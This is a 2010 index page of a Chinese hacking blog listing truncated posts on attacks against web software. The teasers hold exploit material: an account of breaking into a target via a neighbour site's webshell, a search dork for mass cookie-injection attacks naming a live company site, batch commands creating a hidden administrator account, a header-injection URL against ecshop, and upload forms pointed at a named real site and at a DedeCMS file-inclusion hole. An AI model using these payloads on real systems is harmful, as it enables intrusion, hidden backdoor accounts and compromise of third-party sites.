影子鹰安全网络-主站技术BLOG, 进阶式的学习平台...
 
用户登陆
用户:
密码:
   

站点日历
73 2010 - 9 48
   1234
567891011
12131415161718
19202122232425
2627282930

站点统计
日志:1320 篇
评论:3702 篇
引用:303812 个
会员:1170 人
留言:172 个
访问:18749320 次
今日:18670 平均:7000
建站:2001-10-10
在线人数: ?

最新评论

日志搜索

 标题   内容

友情链接
其他信息
影子鹰安全网络-主站技术BLOG
::订阅到抓虾::
订阅到飞鸽
订阅到GOOGLE
订阅到yahoo
订阅到ROJO
RSS 1.0
RSS 2.0
[全部订阅更新]
[鄂ICP备05002492号]
联系我

::影子鹰业务联系专用QQ:;

Gmail:coolkawen(at)Gmail.com站长KAWEN联系方式
QQ群(::Blog交流::)

旗下域名

www.cn9x.com
www.cnyzy.cn


FEED订阅数一览


EMAIL订阅FEED

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  ... [121]  显示模式: 默认模式 | 树形模式
[置顶] 寻找台湾,韩国,国外合作伙伴!   [ 2009-07-31  |  影子鹰  | 晴天]   

寻求与台湾,韩国,国外公司或是个人或是团队的商业合作!我们拥有专业的计算机知识以及近十年的网络技术经验,拥有自已的专业积累数据库和资源。诚意找寻长期的合作伙伴。有意请直接联系QQ:635465491 注明:商业合作

阅读全文……
作者:kawen | 分类:专业出售 | 评论:0 | 引用:0 | 查看:609
[置顶] 评论关闭,有话要说请直接留言   [ 2007-06-27  |  影子鹰  | 晴天]   
[置顶] 新域名:cn9x.com&cnyzy.cn 上线使用!   [ 2007-04-15  |  本站原创  | 晴天]   

影子鹰安全网络启用全新域名

国内顶级域名:www.cnyzy.cn   (CN为中国缩写,YZY为影子鹰缩写)

国际顶级域名:www.cn9x.com (CN为中国缩写,9为极数,最大的意思,X代表商业结构)

阅读全文……
作者:kawen | 分类:生活心情 | 评论:72 | 引用:524 | 查看:117735

今晚在搞个黑客站的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。

       无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就再帖下,并说明用法!

Set ObjService=GetObject("IIS://LocalHost/W3SVC") 

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:12
晴天 iwebshop0.7.7 0day   [ 2010-09-03 08:43:14  |  影子鹰 ]

漏洞出在根目录的auction_list.php,第77行-86行:

/* 浏览记录 */ 
$getcookie = get_hisgoods_cookie(); 
$goodshistory = array(); 

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:13
晴天 cookie注射批量拿企业站   [ 2010-09-03 08:42:30  |  影子鹰 ]

直接百度或者google一下

关键字:inurl:CompHonorBig.asp?id 出现了很多站点..百度一下,找到相关网页约35,700篇,用时0.231秒

我们到后面几页随便打开一个 http://www.xzruizhe.com/

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:15
雨天 微软全系统建立隐藏账户漏洞   [ 2010-09-03 08:41:51  |  影子鹰 ]

可以通过特殊字符建立隐藏账户.命令行界面下不显示,用户管理面板中显示为空.非$..

可以通过智能ABC输入法中V9里的空白字符建立隐藏帐号,命令行下无法建立,可以先写个批处理,如下:
net user 123 /add
net localgroup administrators /add

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:14
晴天 ecshop广告调用页消息头写入暴路   [ 2010-09-01 08:25:11  |  影子鹰 ]

/affiche.php,php5环境提示错误暴露程序路径,php4环境显示写入的信息
charset参数未做严谨过滤导致http消息头截断写入
http://localhost/test/ecshop/affiche.php?act=js&type=3&from=xxx&ad_id=1&charset=GBK%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0AContent-Length:%2035%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%0A 

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:25
晴天 动网PHP论坛preview.php代码执行漏洞   [ 2010-09-01 08:24:49  |  影子鹰 ]

动网(DVBBS)PHP论坛preview.php代码执行漏洞

动网(DVBBS)论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。

在文件preview.php中:

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:23
晴天 zen cart 1.38a 多处漏洞0day   [ 2010-08-31 08:24:50  |  影子鹰 ]

<form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:24

本地包含的利用方法。

<form action=”http://www.ra1nker/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post” method=”post” enctype=”multipart/form-data” name=”QuickSearch” id=”QuickSearch”>
<input type=”hidden” name=”newname” value=”1.asa”>
<input type=”file” name=”uploadfile”>

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:37
晴天 NetCms 注册上传漏洞 Oday   [ 2010-08-26 11:30:51  |  影子鹰 ]

NetCMS网站内容管理系是国内最优秀的网站建设程序,全免费全开源 ,由于发表消息附件未

进行严格过滤,导致可上传任意文件漏洞。

测试利用: 1、进去, /user/login.aspx ,点注册。

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:40
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  ... [121]  
  Powered by www.cnyzy.cn Rights © 2006 Processed in 0.125000 second(s) , 5 queries